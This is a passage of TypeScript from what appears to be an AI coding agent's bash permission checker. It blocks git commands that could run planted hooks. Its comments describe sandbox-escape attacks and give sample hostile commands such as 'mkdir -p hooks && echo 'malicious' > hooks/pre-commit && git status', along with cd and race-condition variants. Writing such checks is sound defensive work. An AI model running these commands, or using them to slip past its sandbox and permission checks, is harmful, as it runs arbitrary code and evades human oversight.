1835 * mkdir -p objects refs hooks && echo '#!/bin/bash\nmalicious' > hooks/pre-commit && touch HEAD && git status
1836 *
1837 * @param command The full command string to check
1838 * @returns true if any subcommand writes to git-internal paths
1839 */
1840function commandWritesToGitInternalPaths(command: string): boolean {
1841  const subcommands = splitCommand_DEPRECATED(command)
1842
1843  for (const subcmd of subcommands) {
1844    const trimmed = subcmd.trim()
1845
1846    // Check write paths from path-based commands (mkdir, touch, cp, mv)
1847    const writePaths = extractWritePathsFromSubcommand(trimmed)
1848    for (const path of writePaths) {
1849      if (isGitInternalPath(path)) {
1850        return true
1851      }
1852    }
1853
1854    // Check output redirections (e.g., echo x > hooks/pre-commit)
1855    const { redirections } = extractOutputRedirections(trimmed)
1856    for (const { target } of redirections) {
1857      if (isGitInternalPath(target)) {
1858        return true
1859      }
1860    }
1861  }
1862
1863  return false
1864}
1865
1866/**
1867 * Checks read-only constraints for bash commands.
1868 * This is the single exported function that validates whether a command is read-only.
1869 * It handles compound commands, sandbox mode, and safety checks.
1870 *
1871 * @param input The bash command input to validate
1872 * @param compoundCommandHasCd Pre-computed flag indicating if any cd command exists in the compound command.
1873 *                              This is computed by commandHasAnyCd() and passed in to avoid duplicate computation.
1874 * @returns PermissionResult indicating whether the command is read-only
1875 */
1876export function checkReadOnlyConstraints(
1877  input: z.infer<typeof BashTool.inputSchema>,
1878  compoundCommandHasCd: boolean,
1879): PermissionResult {
1880  const { command } = input
1881
1882  // Detect if the command is not parseable and return early
1883  const result = tryParseShellCommand(command, env => `$${env}`)
1884  if (!result.success) {
1885    return {
1886      behavior: 'passthrough',
1887      message: 'Command cannot be parsed, requires further permission checks',
1888    }
1889  }
1890
1891  // Check the original command for safety before splitting
1892  // This is important because splitCommand_DEPRECATED may transform the command
1893  // (e.g., ${VAR} becomes $VAR)
1894  if (bashCommandIsSafe_DEPRECATED(command).behavior !== 'passthrough') {
1895    return {
1896      behavior: 'passthrough',
1897      message: 'Command is not read-only, requires further permission checks',
1898    }
1899  }
1900
1901  // Check for Windows UNC paths in the original command before transformation
1902  // This must be done before splitCommand_DEPRECATED because splitCommand_DEPRECATED may transform backslashes
1903  if (containsVulnerableUncPath(command)) {
1904    return {
1905      behavior: 'ask',
1906      message:
1907        'Command contains Windows UNC path that could be vulnerable to WebDAV attacks',
1908    }
1909  }
1910
1911  // Check once if any subcommand is a git command (used for multiple security checks below)
1912  const hasGitCommand = commandHasAnyGit(command)
1913
1914  // SECURITY: Block compound commands that have both cd AND git
1915  // This prevents sandbox escape via: cd /malicious/dir && git status
1916  // where the malicious directory contains fake git hooks that execute arbitrary code.
1917  if (compoundCommandHasCd && hasGitCommand) {
1918    return {
1919      behavior: 'passthrough',
1920      message:
1921        'Compound commands with cd and git require permission checks for enhanced security',
1922    }
1923  }
1924
1925  // SECURITY: Block git commands if the current directory looks like a bare/exploited git repo
1926  // This prevents sandbox escape when an attacker has:
1927  // 1. Deleted .git/HEAD to invalidate the normal git directory
1928  // 2. Created hooks/pre-commit or other git-internal files in the current directory
1929  // Git would then treat the cwd as the git directory and execute malicious hooks.
1930  if (hasGitCommand && isCurrentDirectoryBareGitRepo()) {
1931    return {
1932      behavior: 'passthrough',
1933      message:
1934        'Git commands in directories with bare repository structure require permission checks for enhanced security',
1935    }
1936  }
1937
1938  // SECURITY: Block compound commands that write to git-internal paths AND run git
1939  // This prevents sandbox escape where a command creates git-internal files
1940  // (HEAD, objects/, refs/, hooks/) and then runs git, which would execute
1941  // malicious hooks from the newly created files.
1942  // Example attack: mkdir -p hooks && echo 'malicious' > hooks/pre-commit && git status
1943  if (hasGitCommand && commandWritesToGitInternalPaths(command)) {
1944    return {
1945      behavior: 'passthrough',
1946      message:
1947        'Compound commands that create git internal files and run git require permission checks for enhanced security',
1948    }
1949  }
1950
1951  // SECURITY: Only auto-allow git commands as read-only if we're in the original cwd
1952  // (which is protected by sandbox denyWrite) or if sandbox is disabled (attack is moot).
1953  // Race condition: a sandboxed command can create bare repo files in a subdirectory,
1954  // and a backgrounded git command (e.g. sleep 10 && git status) would pass the
1955  // isCurrentDirectoryBareGitRepo() check at evaluation time before the files exist.
1956  if (
1957    hasGitCommand &&
1958    SandboxManager.isSandboxingEnabled() &&
1959    getCwd() !== getOriginalCwd()
1960  ) {
1961    return {
1962      behavior: 'passthrough',
1963      message:
1964        'Git commands outside the original working directory require permission checks when sandbox is enabled',
1965    }
1966  }
1967
1968  // Check if all subcommands are read-only
1969  const allSubcommandsReadOnly = splitCommand_DEPRECATED(command).every(
1970    subcmd => {
1971      if (bashCommandIsSafe_DEPRECATED(subcmd).behavior !== 'passthrough') {
1972        return false
1973      }
1974      return isCommandReadOnly(subcmd)
1975    },
1976  )
1977
1978  if (allSubcommandsReadOnly) {
1979    return {
1980      behavior: 'allow',
1981      updatedInput: input,
1982    }
1983  }
1984
1985  // If not read-only, return passthrough to let other permission checks handle it
1986  return {
1987    behavior: 'passthrough',
1988    message: 'Command is not read-only, requires further permission checks',
1989  }
1990}